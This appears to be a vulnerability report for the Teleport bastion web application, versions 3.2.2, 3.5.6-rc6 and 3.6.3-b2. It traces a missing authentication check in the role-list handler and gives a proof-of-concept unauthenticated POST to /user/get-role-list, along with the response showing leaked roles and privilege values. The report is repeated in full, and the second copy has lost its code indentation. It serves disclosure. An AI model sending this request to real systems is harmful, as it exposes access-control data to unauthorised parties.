arleyna/code

## code
# The name of an affected Product

teleport

# The affected or fixed version(s).

> teleport - 3.2.2
> teleport - 3.5.6-rc6
> teleport - 3.6.3-b2

# Vulnerability Type

Unauthorized access vulnerability

# Root Cause

```
data/www/teleport/webroot/app/controller/__init__.py
```
Some path interface.
```
    (r'/user/group', user.GroupListHandler),
    #  - 某个用户组的管理页面
    (r'/user/group/(.*)', user.GroupInfoHandler),
    #  - [json] 获取用户组列表（包括不超过5个组内成员）
    (r'/user/get-groups-with-member', user.DoGetGroupWithMemberHandler),
    #  - [json] 获取角色列表
    (r'/user/get-role-list', user.DoGetRoleListHandler),
    #  - [json] 批量设置角色
    (r'/user/set-role', user.DoSetRoleForUsersHandler),
```

Follow up ```user.DoGetRoleListHandler``` method.

```
data/www/teleport/webroot/app/controller/user.py
```

```
class DoGetRoleListHandler(TPBaseJsonHandler):
    def post(self):
        err, role_list = user.get_role_list()
        if err != TPE_OK:
            self.write_json(err)
        else:
            self.write_json(TPE_OK, data=role_list)
```

Missing validation

# POC

Requests:
```
POST /user/get-role-list HTTP/1.1
Host: 127.0.0.1:7190
Content-Length: 4
Connection: close

xx

```

Responses:
```
HTTP/1.1 200 OK
Server: TornadoServer/6.1
Content-Type: application/json; charset=UTF-8
Date: Wed, 16 Nov 2022 07:18:38 GMT
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Content-Length: 293
Set-Cookie: _sid=tp_1668583118_a918a432f2b4bcf2; Path=/
Connection: close

{"code": 0, "message": "", "data": [{"id": 1, "name": "\u7cfb\u7edf\u7ba1\u7406\u5458", "privilege": 4294967295}, {"id": 2, "name": "\u8fd0\u7ef4\u4eba\u5458", "privilege": 513}, {"id": 3, "name": "\u5ba1\u8ba1\u5458", "privilege": 32769}, {"id": 4, "name": "ok\u89d2\u8272", "privilege": 1}]}
```

# Impact
Teleport v3.2.2, Teleport v3.5.6-rc6, and Teleport v3.6.3-b2 was discovered to contain an information leak via the /user/get-role-list web interface.
	# The name of an affected Product

	teleport

	# The affected or fixed version(s).

	> teleport - 3.2.2
	> teleport - 3.5.6-rc6
	> teleport - 3.6.3-b2

	# Vulnerability Type

	Unauthorized access vulnerability

	# Root Cause

	```
	data/www/teleport/webroot/app/controller/__init__.py
	```
	Some path interface.
	```
	(r'/user/group', user.GroupListHandler),
	# - 某个用户组的管理页面
	(r'/user/group/(.*)', user.GroupInfoHandler),
	# - [json] 获取用户组列表（包括不超过5个组内成员）
	(r'/user/get-groups-with-member', user.DoGetGroupWithMemberHandler),
	# - [json] 获取角色列表
	(r'/user/get-role-list', user.DoGetRoleListHandler),
	# - [json] 批量设置角色
	(r'/user/set-role', user.DoSetRoleForUsersHandler),
	```

	Follow up ```user.DoGetRoleListHandler``` method.

	```
	data/www/teleport/webroot/app/controller/user.py
	```

	```
	class DoGetRoleListHandler(TPBaseJsonHandler):
	def post(self):
	err, role_list = user.get_role_list()
	if err != TPE_OK:
	self.write_json(err)
	else:
	self.write_json(TPE_OK, data=role_list)
	```

	Missing validation

	# POC

	Requests:
	```
	POST /user/get-role-list HTTP/1.1
	Host: 127.0.0.1:7190
	Content-Length: 4
	Connection: close

	xx

	```

	Responses:
	```
	HTTP/1.1 200 OK
	Server: TornadoServer/6.1
	Content-Type: application/json; charset=UTF-8
	Date: Wed, 16 Nov 2022 07:18:38 GMT
	Access-Control-Allow-Origin: *
	Access-Control-Allow-Headers: *
	Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
	Content-Length: 293
	Set-Cookie: _sid=tp_1668583118_a918a432f2b4bcf2; Path=/
	Connection: close

	{"code": 0, "message": "", "data": [{"id": 1, "name": "\u7cfb\u7edf\u7ba1\u7406\u5458", "privilege": 4294967295}, {"id": 2, "name": "\u8fd0\u7ef4\u4eba\u5458", "privilege": 513}, {"id": 3, "name": "\u5ba1\u8ba1\u5458", "privilege": 32769}, {"id": 4, "name": "ok\u89d2\u8272", "privilege": 1}]}
	```

	# Impact
	Teleport v3.2.2, Teleport v3.5.6-rc6, and Teleport v3.6.3-b2 was discovered to contain an information leak via the /user/get-role-list web interface.